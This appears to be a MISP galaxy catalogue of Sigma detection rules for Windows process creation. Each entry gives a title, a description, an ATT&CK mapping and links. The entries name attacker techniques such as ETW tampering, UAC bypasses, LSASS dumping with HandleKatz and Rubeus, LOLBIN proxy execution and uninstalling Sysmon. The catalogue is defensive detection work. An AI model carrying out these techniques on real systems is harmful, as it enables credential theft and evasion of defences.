https://twitter.com/malmoeb/status/1550483085472432128

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml

ETW Logging Tamper In .NET Processes

Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.

The tag is: misp-galaxy:sigma-rules="ETW Logging Tamper In .NET Processes"

ETW Logging Tamper In .NET Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 10119. Table References

Links

https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables

https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf

https://twitter.com/xpn/status/1268712093928378368

https://bunnyinside.com/?term=f71e8cb9c76a

http://managed670.rssing.com/chan-5590147/all_p1.html

https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr

https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38

https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code

https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39

https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml

Security Tools Keyword Lookup Via Findstr.EXE

Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.

The tag is: misp-galaxy:sigma-rules="Security Tools Keyword Lookup Via Findstr.EXE"

Security Tools Keyword Lookup Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 10120. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery

https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf

https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml

Suspicious Sigverif Execution

Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution

The tag is: misp-galaxy:sigma-rules="Suspicious Sigverif Execution"

Suspicious Sigverif Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10121. Table References

Links

https://twitter.com/0gtweet/status/1457676633809330184

https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml

Suspicious Schtasks Schedule Types

Detects scheduled task creations or modification on a suspicious schedule type

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks Schedule Types"

Suspicious Schtasks Schedule Types has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10122. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml

ConvertTo-SecureString Cmdlet Usage Via CommandLine

Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity

The tag is: misp-galaxy:sigma-rules="ConvertTo-SecureString Cmdlet Usage Via CommandLine"

ConvertTo-SecureString Cmdlet Usage Via CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10123. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml

Sysinternals PsSuspend Execution

Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes

The tag is: misp-galaxy:sigma-rules="Sysinternals PsSuspend Execution"

Sysinternals PsSuspend Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10124. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend

https://twitter.com/0gtweet/status/1638069413717975046

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml

Uncommon Child Process Of AddinUtil.EXE

Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of AddinUtil.EXE"

Uncommon Child Process Of AddinUtil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10125. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml

Suspicious Diantz Download and Compress Into a CAB File

Detects the use of diantz to download a remote file, compress it and store it in a CAB file on the local machine.

The tag is: misp-galaxy:sigma-rules="Suspicious Diantz Download and Compress Into a CAB File"

Suspicious Diantz Download and Compress Into a CAB File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10126. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml

Use NTFS Short Name in Command Line

Detects use of Windows 8.3 short names in the command line, which could be used as a method to avoid command-line detection

The tag is: misp-galaxy:sigma-rules="Use NTFS Short Name in Command Line"

Use NTFS Short Name in Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10127. Table References

Links

https://twitter.com/jonasLyk/status/1555914501802921984

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml

HackTool - HandleKatz LSASS Dumper Execution

Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to LSASS in order to create an obfuscated memory dump of that process

The tag is: misp-galaxy:sigma-rules="HackTool - HandleKatz LSASS Dumper Execution"

HackTool - HandleKatz LSASS Dumper Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10128. Table References

Links

https://github.com/codewhitesec/HandleKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml

Suspicious Encoded PowerShell Command Line

Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)

The tag is: misp-galaxy:sigma-rules="Suspicious Encoded PowerShell Command Line"

Suspicious Encoded PowerShell Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10129. Table References

Links

https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml

Remote Access Tool - ScreenConnect Remote Command Execution

Detects the execution of a system command via the ScreenConnect RMM service.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Remote Command Execution"

Remote Access Tool - ScreenConnect Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10130. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml

PUA - Fast Reverse Proxy (FRP) Execution

Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.

The tag is: misp-galaxy:sigma-rules="PUA - Fast Reverse Proxy (FRP) Execution"

PUA - Fast Reverse Proxy (FRP) Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10131. Table References

Links

https://github.com/fatedier/frp

https://asec.ahnlab.com/en/38156/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_frp.yml

Use Of The SFTP.EXE Binary As A LOLBIN

Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag

The tag is: misp-galaxy:sigma-rules="Use Of The SFTP.EXE Binary As A LOLBIN"

Use Of The SFTP.EXE Binary As A LOLBIN has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10132. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml

UAC Bypass Using IDiagnostic Profile

Detects the "IDiagnosticProfileUAC" UAC bypass technique

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IDiagnostic Profile"

UAC Bypass Using IDiagnostic Profile has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10133. Table References

Links

https://github.com/Wh04m1001/IDiagnosticProfileUAC

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml

HackTool - RedMimicry Winnti Playbook Execution

Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility

The tag is: misp-galaxy:sigma-rules="HackTool - RedMimicry Winnti Playbook Execution"

HackTool - RedMimicry Winnti Playbook Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10134. Table References

Links

https://redmimicry.com/posts/redmimicry-winnti/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml

Allow Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.

The tag is: misp-galaxy:sigma-rules="Allow Service Access Using Security Descriptor Tampering Via Sc.EXE"

Allow Service Access Using Security Descriptor Tampering Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10135. Table References

Links

https://twitter.com/0gtweet/status/1628720819537936386

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml

Indirect Command Execution From Script File Via Bash.EXE

Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash

The tag is: misp-galaxy:sigma-rules="Indirect Command Execution From Script File Via Bash.EXE"

Indirect Command Execution From Script File Via Bash.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10136. Table References

Links

https://linux.die.net/man/1/bash

Internal Research

https://lolbas-project.github.io/lolbas/Binaries/Bash/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_file_execution.yml

Wscript Shell Run In CommandLine

Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity

The tag is: misp-galaxy:sigma-rules="Wscript Shell Run In CommandLine"

Wscript Shell Run In CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10137. Table References

Links

https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml

Conhost.exe CommandLine Path Traversal

Detects the usage of path traversal in conhost.exe, indicating possible command/argument confusion or hijacking

The tag is: misp-galaxy:sigma-rules="Conhost.exe CommandLine Path Traversal"

Conhost.exe CommandLine Path Traversal has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10138. Table References

Links

https://pentestlab.blog/2020/07/06/indirect-command-execution/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml

PowerShell Base64 Encoded Invoke Keyword

Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded Invoke Keyword"

PowerShell Base64 Encoded Invoke Keyword has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10139. Table References

Links

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml

Renamed AutoHotkey.EXE Execution

Detects execution of a renamed autohotkey.exe binary based on PE metadata fields

The tag is: misp-galaxy:sigma-rules="Renamed AutoHotkey.EXE Execution"

Table 10140. Table References

Links

https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/

https://www.autohotkey.com/download/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml

Detection of PowerShell Execution via Sqlps.exe

This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

The tag is: misp-galaxy:sigma-rules="Detection of PowerShell Execution via Sqlps.exe"

Detection of PowerShell Execution via Sqlps.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10141. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/

https://twitter.com/bryon_/status/975835709587075072

https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml

Use of UltraViewer Remote Access Software

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Use of UltraViewer Remote Access Software"

Use of UltraViewer Remote Access Software has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10142. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml

Suspicious Execution From Outlook Temporary Folder

Detects a suspicious program execution in the Outlook temp folder

The tag is: misp-galaxy:sigma-rules="Suspicious Execution From Outlook Temporary Folder"

Suspicious Execution From Outlook Temporary Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10143. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml

Stop Windows Service Via Net.EXE

Detects the stopping of a Windows service via the "net" utility.

The tag is: misp-galaxy:sigma-rules="Stop Windows Service Via Net.EXE"

Stop Windows Service Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10144. Table References

Links

https://ss64.com/nt/net-service.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_stop_service.yml

Renamed Jusched.EXE Execution

Detects the execution of a renamed "jusched.exe" as seen used by the Cobalt group

The tag is: misp-galaxy:sigma-rules="Renamed Jusched.EXE Execution"

Renamed Jusched.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10145. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml

PUA - AdvancedRun Execution

Detects the execution of the AdvancedRun utility

The tag is: misp-galaxy:sigma-rules="PUA - AdvancedRun Execution"

PUA - AdvancedRun Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10146. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

https://twitter.com/splinter_code/status/1483815103279603714

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml

Uninstall Sysinternals Sysmon

Detects the removal of Sysmon, which could be a potential attempt at defense evasion

The tag is: misp-galaxy:sigma-rules="Uninstall Sysinternals Sysmon"

Uninstall Sysinternals Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10147. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml

UAC Bypass Using Windows Media Player - Process

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Windows Media Player - Process"

UAC Bypass Using Windows Media Player - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10148. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml

HackTool - Rubeus Execution

Detects the execution of the hacktool Rubeus via PE information or command line parameters

The tag is: misp-galaxy:sigma-rules="HackTool - Rubeus Execution"

HackTool - Rubeus Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 10149. Table References

Links

https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml

Gzip Archive Decode Via PowerShell

Detects attempts of decoding encoded Gzip archives via PowerShell.

The tag is: misp-galaxy:sigma-rules="Gzip Archive Decode Via PowerShell"

Gzip Archive Decode Via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 10150. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml

Group Membership Reconnaissance Via Whoami.EXE

Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.

The tag is: misp-galaxy:sigma-rules="Group Membership Reconnaissance Via Whoami.EXE"

Group Membership Reconnaissance Via Whoami.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10151. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml

Suspicious Csi.exe Usage

Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter on the command line. An early version of this utility, provided with the Microsoft "Roslyn" Community Technology Preview, was named 'rcsi.exe'.

The tag is: misp-galaxy:sigma-rules="Suspicious Csi.exe Usage"

Suspicious Csi.exe Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10152. Table References

Links

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/

https://twitter.com/Z3Jpa29z/status/1317545798981324801

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml

Suspicious Git Clone

Detects execution of "git" to clone a remote repository whose URL contains suspicious keywords

The tag is: misp-galaxy:sigma-rules="Suspicious Git Clone"

Suspicious Git Clone has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1593.003" with estimative-language:likelihood-probability="almost-certain"

Table 10153. Table References

Links

https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_git_susp_clone.yml

HackTool - SharpImpersonation Execution

Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively

The tag is: misp-galaxy:sigma-rules="HackTool - SharpImpersonation Execution"

HackTool - SharpImpersonation Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"

Table 10154. Table References

Links

https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

https://github.com/S3cur3Th1sSh1t/SharpImpersonation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml

Rundll32 InstallScreenSaver Execution

An attacker may execute an application as an SCR file using rundll32.exe desk.cpl,InstallScreenSaver

The tag is: misp-galaxy:sigma-rules="Rundll32 InstallScreenSaver Execution"

Rundll32 InstallScreenSaver Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10155. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl

https://lolbas-project.github.io/lolbas/Libraries/Desk/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml

Service StartupType Change Via Sc.EXE

Detects the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"

The tag is: misp-galaxy:sigma-rules="Service StartupType Change Via Sc.EXE"

Service StartupType Change Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10156. Table References

Links

https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_disable_service.yml

Windows Hotfix Updates Reconnaissance Via Wmic.EXE

Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used in pentester and attacker enumeration scripts

The tag is: misp-galaxy:sigma-rules="Windows Hotfix Updates Reconnaissance Via Wmic.EXE"

Windows Hotfix Updates Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10157. Table References

Links

https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml

Potentially Suspicious WebDAV LNK Execution

Detects possible execution via LNK file accessed on a WebDAV server.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious WebDAV LNK Execution"

Potentially Suspicious WebDAV LNK Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 10158. Table References

Links

https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html

https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml

Potential File Download Via MS-AppInstaller Protocol Handler

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"

The tag is: misp-galaxy:sigma-rules="Potential File Download Via MS-AppInstaller Protocol Handler"

Potential File Download Via MS-AppInstaller Protocol Handler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10159. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml

Suspicious FromBase64String Usage On Gzip Archive - Process Creation

